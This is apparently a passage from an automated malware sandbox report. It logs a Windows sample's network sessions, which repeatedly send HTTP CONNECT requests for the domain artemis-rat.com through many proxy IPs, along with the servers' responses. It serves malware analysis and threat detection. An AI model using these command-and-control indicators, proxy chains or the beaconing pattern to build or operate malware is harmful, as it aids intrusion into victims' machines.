                                              882192.168.2.452190115.146.225.137100467284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.044543982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              883192.168.2.45263534.95.243.12280817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.044852018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.757092953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.866563082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.866661072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.189543962 CET59INHTTP/1.1 200 Connection Established
                                              Proxy-agent: nginx


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              884192.168.2.450486203.150.128.11880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.044871092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.054088116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163635015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.747338057 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              885192.168.2.452845185.162.229.127807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.045146942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.199677944 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              886192.168.2.452694212.110.188.216344057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.045414925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866218090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.799582005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.554122925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.054584026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.663451910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.248490095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.257035017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              887192.168.2.452858104.18.44.93807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.045615911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.200314999 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              888192.168.2.452859104.21.218.103807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.045761108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.200078011 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              889192.168.2.452871172.67.182.78807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.046185970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.200603008 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              890192.168.2.452667178.54.21.20380817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.048245907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              891192.168.2.452882104.25.194.175807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.065988064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.220807076 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              892192.168.2.452895172.67.3.108807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.066368103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.220901966 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              893192.168.2.45270561.129.2.21280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.066868067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.383702040 CET536INHTTP/1.1 502 Bad Gateway
                                              Server: nginx/1.20.1
                                              Date: Mon, 11 Mar 2024 07:34:50 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 559
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padd


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              894192.168.2.45207134.95.231.228420427284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.068305969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.072981119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.246803045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.366480112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.366390944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:57.381834030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.522556067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:15.077831030 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              895192.168.2.45271858.221.193.7488887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.071683884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.389636040 CET348INHTTP/1.1 404 Not Found
                                              Server: MyWebServer/3.6.20 Unicode (By TGY)
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html; Charset=GB2312
                                              Content-Length: 154
                                              Connection: Keep-Alive
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 3e 3c 68 33 3e 4d 79 57 65 62 53 65 72 76 65 72 2f 33 2e 36 2e 32 30 20 55 6e 69 63 6f 64 65 20 28 42 79 20 54 47 59 29 3c 2f 68 33 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1><hr><h3>MyWebServer/3.6.20 Unicode (By TGY)</h3></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              896192.168.2.452186103.245.204.21480807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.074258089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              897192.168.2.452752158.247.207.15330307284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.084708929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.775719881 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              898192.168.2.452917203.24.102.178807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.088304996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.242904902 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              899192.168.2.452822184.185.2.1241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.088953972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.757015944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              900192.168.2.45269547.100.91.5780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.089510918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866317034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
